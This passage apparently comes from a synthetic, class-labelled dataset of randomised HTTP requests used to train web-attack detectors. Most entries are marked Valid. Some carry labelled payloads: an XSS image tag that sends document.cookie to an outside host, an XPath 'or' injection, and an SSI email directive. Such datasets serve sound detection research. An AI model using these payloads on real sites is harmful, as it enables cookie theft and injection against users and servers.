If-None-Match: "oU9S8HJbwoaqhC0lb"
If-Range: *
Max-Forwards: 4348
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: NTLM aHQzbnNvZTNyamVjZWRhYXRzRnRhZ2hscDRwNXEzaDZrYWFuaml1MXI=
Authorization: NTLM Z2F6Y2dudGFpcm9Nc3lpb3lkZWFUYnBuaWUzb2lkbnNzb2V2YWFsYQ==
Range: 415535-51
Referer: http://ie3kts.net/eqe3rsr.msf
TE: gzip,trailers,gzip;q=0.2
Trailer: From
User-Agent: IEmeNt0e2gusD
UA-CPU: Sparc
UA-Disp: 618,722,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 124x705
Via: ioiay/8.0 www.tnpn9.js, 0.4 www.einut.gif
Transfer-Encoding: gzip
Upgrade: iel/9.0, oheP2O/3.1, Iic66t/8.1
Warning: 203 www.rshjafcw.gif:00 "oocSb7oh" 
X-Forwarded-For: 40.189.230.161
X-Serial-Number: 109708230731
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10989
Start - Id: 18131
class: Valid
GET /tlOQ4kw6iLsIgXIxGiT/ryJCT.png? HTTP/1.1
Host: www.OrsfI2.ch
Connection: close
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: compress, gzip, compress;q=0.2, deflate;q=0.7
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 165.189.39.9
Cookie: eIt0ir=128407;anroelavabccae=eThwvNL;eznepasswdDpxCbd=ea;Fnt=30553;o4=10636
Cookie2: $Version="10"
Date: Sun, 30 May 04 19:52:14 CET
ETag: "uf2hAGsqmjS43WUx"
Expect: 100-continue
From: hwDyshr1@ecneonN.be
If-Modified-Since: Sun, 08 Aug 04 20:32:28 UTC
If-Unmodified-Since: Sun, 06 Jul 08 14:34:58 GMT
If-Match: "Rdmzd4rA4xPbCWFK-RH"
If-None-Match: "2s4ZMmM-ATXHCMGUXQ"
If-Range: Tue, 19 May 09 10:51:52 GMT
Max-Forwards: 63
MIME-Version: 3.6
Pragma: rsw5soa='eR7axohM'
Proxy-Authorization: Digest uri=http://www.a7y0h6.st/wer1vn5/ve4oBpa/efs7f/viroox.js
Authorization: sei5oa oswEzush=tipl
Range: 24-,21839-647
Referer: http://lsWo.com/sinu/iroimlol.php4
TE: trailers
Trailer: Range
User-Agent: rOccvnet/5.6.8.7.4
UA-CPU: Sparc
UA-Disp: 2247,5505,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 4077x543
Via: FTP/3.3 211.251.1.239
Transfer-Encoding: identity
Upgrade: 8rhetT/2.2, 0fno/6.2, Swi/2.0, ehe/1.3, iaeicr/1.5
Warning: 452 79.243.217.186 "hitq" 
X-Forwarded-For: 7.193.95.179
X-Serial-Number: 0610755676490078
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18131
Start - Id: 3225
class: Valid
GET /logKiframeSNI8s7Bhw3U/aisbaljt42oirhy7jtbl/mrefteie9/uZ_G./bE-xPxQ@ivPKZwL9ZPO/on4riamid5hysesa5jTr/SoinhszoorIeoubilEs/bEzkRS/rdUdaeualeezFpzusI5H.pl?ulliee=8985530&kbsdekeaxnul=36353&cwhkihroscth=22121000&ST6B=djREPg&weohuR=etn9metadnr0n&S2umtmjqdEy=idrop1tatitcopyupdatefri&taDoe4hkg=456023466&d8e=tcfoehuaeaclne&6i4atmpi=48&e0aIwzsystemHm0=16079 HTTP/1.0
Host: 174.103.2.0:7324
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 124.168.253.172
Cookie: drdINojeK=375297
Cookie2: $Version="87"
Date: Sun, 29 Aug 04 11:31:01 UTC
ETag: "VuhJFgzieO5j0BbShQhe"
Expect: 100-continue
From: ee5cc9@atzl3njm.com
If-Modified-Since: Fri, 13 May 05 14:10:55 CET
If-Unmodified-Since: Thu, 01 Nov 07 03:28:54 UTC
If-Match: "AWlvFX3g6Z.NoAzNfm"
If-None-Match: "D4iTkqkVrYuVoarLs1U"
If-Range: Wed, 03 Nov 04 04:25:14 CET
Max-Forwards: 44
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: Basic dGVpaHM6b2lsYWRkYWk=
Authorization: Digest realm
Range: 82-228963,737536-47
Referer: http://www.a8tpblt.fr/emsxahd/drtaoP/paDd.pl
TE: chunked,trailers,gzip
Trailer: TE
User-Agent: 5mlas7
UA-CPU: MIPS
UA-Disp: 531,159,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 357x7403
Via: 4.1 93.19.127.104:017, 2.1 www.dsesHpet.js, FTP/8.0 125.177.143.49
Transfer-Encoding: identity
Upgrade: ircioc/5.5, hzedyy/5.6, wArsli/6.7, Euo/8.2
Warning: 925 www.t1tEewa.css "iYe7tpBtm7wyjraztas" 
X-Forwarded-For: 252.218.6.87
X-Serial-Number: 65430
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3225
Start - Id: 31701
class: Valid
GET /mRk.png?-oUz=otesuUhiDo01ela&rcsgetsc=5oAspa&PDN51TK=zt1&hieoaeeofoblh=de&iGhresxlSi=csM%3A HTTP/1.0
Host: 174.37.160.1:631
Connection: 0lNb
Accept: text/html, image/png
Accept-Charset: windows-1250;q=0.2, windows-1251;q=0.7
Accept-Encoding: gzip, gzip;q=0.5, gzip
Accept-Language: *
Cache-Control: no-transform
Client-ip: 68.24.118.237
Cookie: nsoey5Re1=neetr;wsiiaroaee5e=mfwO2UC.ris2
Cookie2: $Version="8"
Date: Sun, 22 Nov 09 11:08:19 CET
ETag: W/"EOB88VYvKs@7B@.m"
Expect: 100-continue
From: rKtsre@uhAOD.com
If-Modified-Since: Thu, 04 May 06 21:32:41 CET
If-Unmodified-Since: Tue, 03 Oct 06 24:36:55 UTC
If-Match: *
If-None-Match: ".cWg7yheuvYY3rkr"
If-Range: "C1zEclAR_BY-yjX"
Max-Forwards: 500
MIME-Version: 2.4
Pragma: ncjsnasn='is9r'
Proxy-Authorization: NTLM c2VpTGhudG5maWVuZWZqdTFUd2I5ZWlxZXI1bW1hb2Vld2Juc2ppNzI=
Authorization: Digest uri=http://www.pspgR.st/tu2u/gnNm0t.avi
Range: 8-
Referer: /Ehhs/ioec/diwvEice/6rwhmnoP/doddide.php4
TE: chunked;q=0.1,chunked;q=0.1,deflate;q=0.1
Trailer: TE
User-Agent: o9im6ht/6.6.6
UA-CPU: PowerPC
UA-Disp: 029,5765,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9430x7643
Via: FTP/9.1 221.244.165.66
Transfer-Encoding: identity
Upgrade: c2e/7.5, L8cezt/0.9
Warning: 582 63.98.99.8 "lare9ilntstaLhew" "Tue, 29 Nov 05 02:58:50 UTC"
X-Forwarded-For: 13.228.134.190
X-Serial-Number: 90134237521191583
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31701
Start - Id: 1706
class: Valid
GET /m1W/lvflN.dvpWSZ4UJ.htm?xmloroptinserts5acceptI=o337qj_o&eleSmraPaIhtw=231&likeSm.RS16@G_=itano7ti7s HTTP/1.0
Host: 19.64.115.222
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ear49i-eseSe;q=0.5, E68-buM3othe, tr-ermymcun;q=0.3, tXnhu-s3lhbjo, 6io-odt;q=0.0
Cache-Control: max-age=26
Client-ip: 125.202.6.4
Cookie: divmeta1VWRD7=ie ne;clLI-q4-hl=328015;rwlcmsLdrwz=14;E5TphMxautoexecO=window.openc;rOmedyc9y8pn0=winnthHtm6group bymmt|;7
Cookie2: $Version="8"
Date: Thu, 09 Mar 06 11:31:59 UTC
ETag: "Fdw5KeeYNqeUops-CWNn"
Expect: rcieAm5l
From: pa7hs@flEnsebniq.be
If-Modified-Since: Tue, 23 Sep 08 13:24:33 UTC
If-Unmodified-Since: Mon, 08 Jan 07 10:23:50 GMT
If-Match: "D0shhJB@JgVFYqMPoN39"
If-None-Match: *
If-Range: "JCofTTam8effiFmWjbR"
Max-Forwards: 339
MIME-Version: 0.3
Pragma: ra='to9'
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: NTLM ZmZ0dG1lam13YWluYXVydElpZXJzeG9vc1JpdGh0TnJva1BidGVwbmU=
Range: 73-
Referer: /t4bPiye.doc
TE: trailers,trailers,gzip
Trailer: Accept
User-Agent: Mozilla/2.8 (Windows; U; Win 9x 7.4; ae-wo; rv:7.7.4) Gecko/64806610
UA-CPU: StrongARM
UA-Disp: 6638,4343,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 3865x207
Via: 3.4 62.16.153.123
Transfer-Encoding: identity
Upgrade: eba/9.5, rtti/0.6, Saos/3.8
Warning: 172 www.poy0Rt8.tiff "fikd" "Wed, 05 Aug 09 17:49:17 UTC"
X-Forwarded-For: 53.157.224.180
X-Serial-Number: 3355979393710804862
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1706
Start - Id: 33657
class: Valid
POST /tgAnealsdona7o3ecdd/nfPidj/rBipdBirnop.bin? HTTP/1.1
Content-Length: 29
Content-Language: tdsf,1e2aeu,ei
Content-Encoding: compress
Content-Location: /epmfvi/iipe.js
Content-MD5: c25hbzVhaUZpdG4xYW52bg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 17 Apr 04 09:27:27 CET
Last-Modified: Mon, 26 Apr 10 02:27:12 GMT
Host: 107.48.57.228
Connection: keep-alive
Accept: audio/*;q=0.4
Accept-Charset: x-mac-greek;q=0.6, iso-8859-15;q=0.7
Accept-Encoding: deflate;q=0.9, compress
Accept-Language: Fr-e8il, 0-ap5, 3sr-1, sili6-e, 6g-rgw
Cache-Control: no-cache
Client-ip: 113.146.215.236
Cookie: QGZYDfUGv=+htChaving6m-eo;Sucat=6
Cookie2: $Version="136"
Date: Fri, 12 Mar 10 10:02:41 CET
ETag: "uDkvoVUULN0XGOr"
Expect: 5jtt=fa8ei;8gtij
From: Utso@nihreoOf.st
If-Modified-Since: Mon, 04 Dec 06 04:08:25 UTC
If-Unmodified-Since: Tue, 19 Oct 04 08:13:42 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 25 Apr 06 04:38:13 UTC
Max-Forwards: 44
MIME-Version: 2.6
Pragma: ieIh='noihrys'
Proxy-Authorization: ecrhet tsDhit=aneesaei
Authorization: NTLM bmNhb2VpeW9waW1nY3VmeWllWlJ0aXgyZGdraG5qQzJlZXQ=
Range: 97019-,-6
Referer: /6csN/ude2a7r/relln/nosare/8IcNRhlt.mdb
TE: gzip,trailers,deflate;q=0.2
Trailer: Accept-Language
User-Agent: oyfaee/6.4
UA-CPU: PowerPC
UA-Disp: 0976,3445,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 3257x6651
Via: teooaw/0.8 125.119.15.120, 2.9 www.ehnneedh.htm, HTTP/6.6 148.60.58.9
Transfer-Encoding: identity
Upgrade: ihLGi/8.8, n6tsu6/2.8
Warning: 207 108.67.175.165 "2eeoi" "Sun, 02 Sep 07 12:24:19 GMT"
X-Forwarded-For: 246.11.40.158
X-Serial-Number: 6339975961282
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

4o=8632&4Eei4raxtTA=esystemak

End - Id: 33657
Start - Id: 11739
class: Valid
GET /qJ1NRa9cscript/srdZ/1srsldctrRoh/2s1le/l5U@Ja/tiw/FZLyopt/lh6eyhevCusnzzrejs/saeci3hrvr/shNenosdqNre/uK4x.xGPqpk.css?maile6y=bh%5CzRsltmpOhca&r5nthfla1i=%27piimgec%3EE4iti&erseitmeciimnn=teZ HTTP/1.0
Host: www.6r31.org
Connection: ecrdvs
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: t-hloeef, nt-60;q=0.2, GaI-2b
Cache-Control: no-transform
Client-ip: 220.48.116.4
Cookie: cesddtrg=openfn5er:dropermO(pb;Od9onts6h=78
Cookie2: $Version="180"
Date: Fri, 14 Jan 05 09:13:37 UTC
ETag: "M4sS256TgoysWFX"
Expect: 100-continue
From: lAuala@v9ti4o.be
If-Modified-Since: Mon, 15 Dec 08 03:38:37 CET
If-Unmodified-Since: Wed, 02 Apr 08 07:15:18 UTC
If-Match: "lCY93.ZkamwcvKN"
If-None-Match: "zDy@ov.KjZtc2wb0-Z3"
If-Range: Mon, 18 Jan 10 18:06:28 UTC
Max-Forwards: 4
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Digest response="aC035b73FACF986E93e1E771dF14eF2b"
Authorization: NTLM WXJhdXJhdGlkbWVzblNpaXJyYnNvaWNyaG95ZXJyNmUz
Range: 1-,5-,24371-73606
Referer: http://www.uiiqh.com/tyAov5/Gen8/dcreeoo/udlsnati/Rihrhtoh.msf
TE: trailers,chunked;q=0.6,trailers
Trailer: Accept-Language
User-Agent: Mozilla/2.8 (X11; U; Open BSD i586 0.5; Hc-ps; rv:1.4.7) Gecko/15430048
UA-CPU: x86
UA-Disp: 1077,6498,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 4702x1407
Via: 0kares/7.7 15.21.171.168, 1.7 185.196.195.102
Transfer-Encoding: compress
Upgrade: aiubsu/5.7, bEar3/1.8, k5eah/6.6, uatn/4.0
Warning: 990 217.45.111.90 "utbxe9d4csrsohke" 
X-Forwarded-For: 173.221.98.4
X-Serial-Number: 68893779
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 11739
Start - Id: 48015
class: XSS
GET /eF4LDE12n_2F/9nbPx/knM/lfA9rDlnaIesezc/oRDanl.480frompK.mspx?YiydhtNe=%3Cimg+++++src+++%3D++++%22alge%22onmouseover%3D++%22+++++%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.deto.com%2Fcgi-bin%2Ftorindon.cgi%27%2Bdocument.cookie%29%3B%5D+++++%22++%3E&5icopy0GZinclude6A=se%27e6&e0ahosd6grm=fb HTTP/1.1
Host: www.4j2iona.ch
Connection: close
Accept: video/mpeg
Accept-Charset: *;q=0.9
Accept-Encoding: compress;q=0.7, identity
Accept-Language: rnyst520-D4aa;q=0.4, hbNs-isc;q=0.7, p91yhdE-nsg3fmt, ado71n-jl;q=0.9, bimq-ixyideif
Cache-Control: min-fresh=0254
Client-ip: 53.120.101.142
Cookie: gsbwco3HngexL=c.c;re7rlehirn5ae=iBvCl;t3rue=ii6Tge8ne;ertosE1erylet=rItK7cZb
Cookie2: $Version="417"
Date: Sun, 04 Oct 09 03:02:09 GMT
ETag: "mJXtu2Cs.k@CXBnl"
Expect: 100-continue
From: uesois@ewrsoxtt.it
If-Modified-Since: Sun, 04 Jul 04 22:13:25 CET
If-Unmodified-Since: Sat, 29 Sep 07 21:16:05 GMT
If-Match: *
If-None-Match: *
If-Range: "47gEF8Pfmlmsd6bmYoZ"
Max-Forwards: 9492
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: uedrde k86eh=jiih
Authorization: Basic bmxhaWtFZmc6dG5iZ25kbw==
Range: 5-,0-4,-81
Referer: http://hmsrotbn.biz/eeast/etzee9es/Ih8aq.bin
TE: trailers,deflate;q=0.2,trailers
Trailer: Range
User-Agent: Mozilla/0.3 (compatible; MSIE 9.7; Unix; hsUMH; 2uirjwvnc; btiggeiL)
UA-CPU: MIPS
UA-Disp: 212,5646,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9754x5278
Via: HTTP/2.2 195.251.247.54, 9.5 www.nwBry.htm, 5.4 www.qottglE.htm
Transfer-Encoding: gzip
Upgrade: mtenw/7.3, ootl0/6.0, ncmojI/8.6
Warning: 237 106.180.134.229 "4e4socieooaey" "Fri, 14 Dec 07 11:55:14 UTC"
X-Forwarded-For: 186.104.154.65
X-Serial-Number: 698729021
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 48015
Start - Id: 21505
class: Valid
GET /l360NuPnph-homeVUleXF/tH1BWj6qJMyDC/yNYth46zesipprEusf9s/mu8yaTa/alnb/nDrGvNg1M6wT/pes/hYb5y95yA3Q4/rTerewutiQceic/iedaiatgo/52.swf?ndewAiposatmes2=astdin2i&dsuExtN0ntRro3i=sotlmdrltnto&owE3sthhb=7595393&serlucg=rmyim0dte HTTP/1.0
Host: 188.229.249.27:80
Connection: keep-alive
Accept: video/*;q=0.2
Accept-Charset: iso-10646-ucs-2, shift_jis, cp-932, euc-kr, windows-1253
Accept-Encoding: *;q=0.6
Accept-Language: eit49-aE9ef, n-39ot4
Cache-Control: max-age=465
Client-ip: 129.114.252.94
Cookie: MwNk=eAconnectyr1rt=unionX;so5hg;Ofengnycm=%l0dhnph-;_CF.AD.tCt=hhjias9ieoDj;Ivnohatluev=4097712
Cookie2: $Version="3"
Date: Sat, 22 Mar 08 18:09:49 UTC
ETag: W/"iv@b4s9k5Xo4jt0E3"
Expect: 100-continue
From: 8whhees@Oeeq.net
If-Modified-Since: Thu, 21 Jan 10 08:41:32 CET
If-Unmodified-Since: Sun, 14 Mar 04 11:26:24 GMT
If-Match: *
If-None-Match: *
If-Range: "-sYKR7A9EzfdHmkbWpy"
Max-Forwards: 032
MIME-Version: 4.1
Pragma: uaa3codr='50mewt9E'
Proxy-Authorization: NTLM dW9lZWd0MHN5amJhZU9ucmh5MWUydHNkZXNlaG5jNG1sZTlvdGht
Authorization: Basic b0ExMDpwdUtiZVNveQ==
Range: 8137-,-4
Referer: /emnezene/laifke/vnais.avi
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: raptjn8mnudr
UA-CPU: Sparc
UA-Disp: 130,178,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 371x8138
Via: HTTP/1.1 105.146.14.101, HTTP/3.0 238.158.46.157
Transfer-Encoding: identity
Upgrade: plddhm/2.0, afiewd/8.6, tst/4.7
Warning: 278 www.noeiu.jpg "ddshudlt" 
X-Forwarded-For: 9.183.95.174
X-Serial-Number: 15490998338905562
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21505
Start - Id: 6172
class: Valid
POST /z63Ma/D-iscriptQ0eCMRhE11/.IyIhC2Mgnph-/oY4rrJq6QiemSFi/u-xOin/yucNPu6o4ji/bIQZybcE/ehesigaettt2loxOtPt/fotkicll2ehmahi.asp? HTTP/1.1
Content-Length: 167
Content-Language: igIyanI,itiwnm
Content-Encoding: gzip
Content-Location: /1nTa/Oe3d/4comreo/utng.gif
Content-MD5: bU5IMmlhT2dMYmhrTnVhUg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 02 Oct 07 12:44:01 UTC
Last-Modified: Wed, 31 May 06 15:15:29 GMT
Host: 164.238.48.56
Connection: close
Accept: application/rtf;q=0.4
Accept-Charset: utf-8, x-mac-turkish, cp-936
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: min-fresh=175
Client-ip: 118.127.32.11
Cookie: eeNatn=T%Na&e
Cookie2: $Version="6"
Date: Mon, 27 Dec 04 07:50:13 CET
ETag: W/"TPeGvsOQvBAbSl0"
Expect: ievs=uataecp;dmoeeno
From: ie7ofUi@efph.fr
If-Modified-Since: Wed, 05 Jul 06 05:30:43 GMT
If-Unmodified-Since: Fri, 21 Jul 06 05:09:57 UTC
If-Match: "cpYC0mJ0xEp1ORC1b"
If-None-Match: "@9S6YP7JvwJJuuVH"
If-Range: *
Max-Forwards: 7
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: Basic MUV6bGVxOlZhZmF5c3Ji
Authorization: Basic YWg0YXhuOmJvZXc=
Range: 144-
Referer: http://www.enn7s1i.gov/bn8n/eetohll/fsWwPrq/cerlon.css
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/4.2 (Machintosh; U; PPC Mac OS X 5.7; rf-uc; rv:4.5.2) Gecko/62946914
UA-CPU: StrongARM
UA-Disp: 2552,3892,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 3345x4822
Via: 6.9 www.fdeeea.shtml, 0.3 www.egpabe.png
Transfer-Encoding: gzip
Upgrade: lnss9/9.1, fla2e/4.4, etv/4.8, Ihxsmr/0.7
Warning: 029 www.mrtsha.jpg "Uoiemhw5aEjopHihf" "Mon, 22 May 06 11:12:43 GMT"
X-Forwarded-For: 207.225.124.53
X-Serial-Number: 113642708
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

EtgdyaoMi=6&rDyq=59ADzP85u&UJ1.q9fromLj938=oQuJ.Ql9s5zo&nemr3edutfcheba=5252775&l3otta=insertarkrre1nar&rmdd8yOhatabt=PXl&egSwoitsfset=mThankstn)0e@m&dLeiwaDmds=pw

End - Id: 6172
Start - Id: 35599
class: XPathInjection
GET /mOL.wBXEGY2B4ve/oDHhLEdjjtWsJwKuOyhl.jpeg?P19processing-instruction0W64_Q8I=ratlapasswdzarae&i5ZSTYKIu=efhotr%27+++or++++l5nsyS%2Fm0hn%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D91%5D++++or+++%271liT%27++%3D+++%27 HTTP/1.0
Host: 107.72.168.162
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: deflate, gzip, identity;q=0.3, gzip;q=0.8
Accept-Language: rnaadh-eosuvyr, swz-tnnuhi;q=0.5, utvySXon-ia8i7
Cache-Control: lajrwe=bae
Client-ip: 180.187.68.18
Cookie: oreeinzeto4r8e=eoytn;gthmeep=ptdsId;triSOciurzkett=o-OJqtDGNqA;nhuqx=0;9rteazee=tf-J.i5fA;uvVqmc=Ose
Cookie2: $Version="98"
Date: Mon, 15 Jan 07 12:31:55 GMT
ETag: "2IZLr6UCFS8Snl6TN"
Expect: 100-continue
From: hsgss@kOcgeesht.ch
If-Modified-Since: Sun, 31 Jan 10 06:05:04 CET
If-Unmodified-Since: Thu, 01 Apr 10 24:36:04 UTC
If-Match: "ShnD2NkYPCwI-Pnxb"
If-None-Match: "rwOo.Tuonx4ayEEa"
If-Range: Mon, 26 Feb 07 17:08:41 CET
Max-Forwards: 084
MIME-Version: 4.7
Pragma: msAtteao='pfv'
Proxy-Authorization: NTLM b2RXcmx2M25sdGE2b3dvcmVIaGxuZWh5b2lzdGlXWGRvdnlvUm0xZXQxbU8zYm0=
Authorization: RTEehi n0ae=metS
Range: 1278-6
Referer: http://eadmeere.org/e1eR/gih2d9be.zip
TE: gzip;q=0.8,trailers
Trailer: Warning
User-Agent: Mozilla/1.9 (compatible; MSIE 0.5; Win98; bdmer)
UA-CPU: 68000
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 138x439
Via: 0.7 www.lnbukrTn.jpg
Transfer-Encoding: compress
Upgrade: eDtxhv/9.1, hrt0Ow/7.8, iatheu/7.3
Warning: 204 197.17.40.24 "eS4aShneveaeoeqAni" "Sun, 06 Nov 05 19:18:19 CET"
X-Forwarded-For: 93.7.188.203
X-Serial-Number: 65275952070459353
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 35599
Start - Id: 39302
class: SSI
GET /om6ajrmaJ8vV.2_Bhxph/sa9tS6lehviheo/2oigsE/dspe_h/24/8JkexeckFH.l03D/dtrXlEsh06retioTS/i4/rd2WgmrBhehalea/kYNBUePoLWOgqPW.exe?gafqu7ease=tR&stde=t&7F9zQpassthruIvmmFx=eI%28rvarcndc6&aA=nKZM7v8&selectvEJZX1iiR=%3C%21--%23email+fromhost%3D%22www.hlioan9.com%22+tohost%3D%22mailbox.oumei.com%22+message%3D%22kmk4UR+isffwwe+aUdeft+etdr%22+fromaddress%3D%22i9asi6.com%22+toaddress%3D%22gji1v.as.com%22+subject%3D%22fs%22+sender%3D%22drtv.com%22+replyto%3D%22mTaeers.com%22+cc%3D%22ahh%22+inreplyto%3D%22Igea+toe+dzh%22+id%3D%22h1dsamail%22+--%3E&olfsdnn=cqiiz_b8zz&ortw4=xhii0n&6vdysa6enuhHt=23&IiikhXe8eanr=s6%2Fnf&etfeHe=autO4ariddshln7e&nkTew3zenahg=object8n&Rurl=9194509144&ndrbunnheel6ti=iuteo&JUFmBiCiDcdropX=yh7iI&documentNS-sock_streamTfsAHA=CilE5 HTTP/1.0
Host: 253.199.111.36:80
Connection: close
Accept: image/*;q=0.5, text/*, text/*;q=0.8
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: Sb8oca=tor
Client-ip: 210.34.89.90
Cookie: aEeo2Elermw=3538;obka4=iBmjYaaHluA8;fbgsoundMK_KU5V0Z=jceteoopasswd0Isen;nmtlnccAaeiA=wc6UtI;ssc9hcegud4HNae=3z aylfewget seEt~ v';e9qr1sd=o@io>hbb
Cookie2: $Version="461"
Date: Wed, 01 Jul 09 15:22:14 CET
ETag: "XSSX6_3FDp7opncFDa"
Expect: iGetlsru
From: rdres4oc@woem.de
If-Modified-Since: Thu, 31 Jan 08 11:47:45 GMT
If-Unmodified-Since: Mon, 02 Nov 09 15:50:31 CET
If-Match: ".RSkPz.zwDpvQWLClqcu"
If-None-Match: "vQH4RvlWOIqenGpkp"
If-Range: *
Max-Forwards: 8
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Basic N3NzZ21vbG86bnUzaQ==
Authorization: NTLM ZWhlbGFvaW5xZWpodHluaWFldW9tZWVPaW5wRXJoNGxHdHRqbnNhYTk=
Range: 9225-57239,301-8
Referer: http://wgaeis.ch/e8hcet/0heiNma.nsf
TE: trailers,deflate;q=0.6
Trailer: Date
User-Agent: HT1jeKtamsp
UA-CPU: MIPS
UA-Disp: 646,7509,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 5234x268
Via: HTTP/8.4 www.utta78AY.css, 8.0 67.28.112.246
Transfer-Encoding: ks2h1; sdgoons=srt4ty
Upgrade: asiM/9.3
Warning: 228 www.sonottir.jpg "rhCetiasi8AntEe7B" "Tue, 08 May 07 07:56:15 GMT"
X-Forwarded-For: 229.251.127.187
X-Serial-Number: 559061405127813998
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 39302
Start - Id: 5226
class: Valid
POST /e4pAELpHT/ZOiLUcStmp5N9/nesen6i/aboad1snrrssoat/nlae.msf? HTTP/1.1
Content-Length: 133
Content-Language: cjt3et,f
Content-Encoding: compress
Content-Location: /iesoparu/etOyfeer.jsp
Content-MD5: ZWFBODVmZmV5MnRhcnVzcg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 09 Feb 04 03:53:31 UTC
Last-Modified: Thu, 13 Oct 05 10:37:24 CET
Host: 56.106.255.229
Connection: close
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=6
Client-ip: 141.181.45.87
Cookie: wO9enanSHh=48
Cookie2: $Version="7"
Date: Tue, 15 Dec 09 12:55:25 GMT
ETag: "b7B8N-xiy2fyNSDHGTjg"
Expect: 100-continue
From: Iei2C2@Mosiosgt.cz
If-Modified-Since: Thu, 02 Jun 05 07:12:13 UTC
If-Unmodified-Since: Tue, 19 Jan 10 08:17:44 CET
If-Match: "@-pvbotahN5iU8OC@"
If-None-Match: *
If-Range: "VsThlgvT2PwB9xDU6.U"
Max-Forwards: 672
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: 4ehath lmnnnnh=bnrte
Authorization: Basic RHVvcGVvdG46OGluc25z
Range: 1680-59732,185999-7
Referer: /ntmOae.asmx
TE: trailers,deflate;q=0.2
Trailer: Trailer
User-Agent: tzH9txQ http://www.3EcoRl.gov
UA-CPU: x86
UA-Disp: 316,8199,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 282x687
Via: 3.3 www.eab7a9.jpg
Transfer-Encoding: gzip
Upgrade: t8a/5.0, adg/8.8, iolsie/3.9, iRIuto/2.9, tTessd/9.3
Warning: 646 www.eBtlm.js "taDea3t" 
X-Forwarded-For: 101.23.25.216
X-Serial-Number: 22844
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

inao=98&vPqF-8buCzpd=usd https&6IddX=26&t7tbmnIaeydll5s=fwRVjd_oDDPq&zLsecfdfid=NitraO52oAg0&Mk6Wius2H=dnpnme&t3ebn=xlbin1sy7rayesyNa

End - Id: 5226
Start - Id: 9805
class: Valid
GET /mZ/stsueantf27vdp9/uRye/.o/z5CE0bECof3/eMby8OmQ/seAdeynaz87Hei4/tteDlett5tuppU.cfm?aetlngtaHOa=630&lsfoerlrse=0771&Sf3qereesmssoti=ehttpsb HTTP/1.1
Host: 46.58.11.196:47
Connection: keep-alive
Accept: application/*, application/postscript, application/x-tar;q=0.0
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=8
Client-ip: 142.252.165.176
Cookie: 9fA6stEe=e%3F52%28egne%29tenin;hl=6;%uTe-P=obcmdgdperlngtso6;ac4tphhue=dHeKeUjTd6U;xuhhhTlEk=xbetween%3A
Cookie2: $Version="13"
Date: Sun, 05 Sep 04 13:52:19 GMT
ETag: "Gm.mVSyx-sz9IJIkCK"
Expect: 100-continue
From: 9rLl@rrheE.org
If-Modified-Since: Thu, 03 Jan 08 05:54:25 GMT
If-Unmodified-Since: Tue, 30 Aug 05 16:45:31 GMT
If-Match: "MFnHqFCSpxfFI4cD@3"
If-None-Match: *
If-Range: Sat, 14 Jun 08 05:57:10 UTC
Max-Forwards: 02
MIME-Version: 6.8
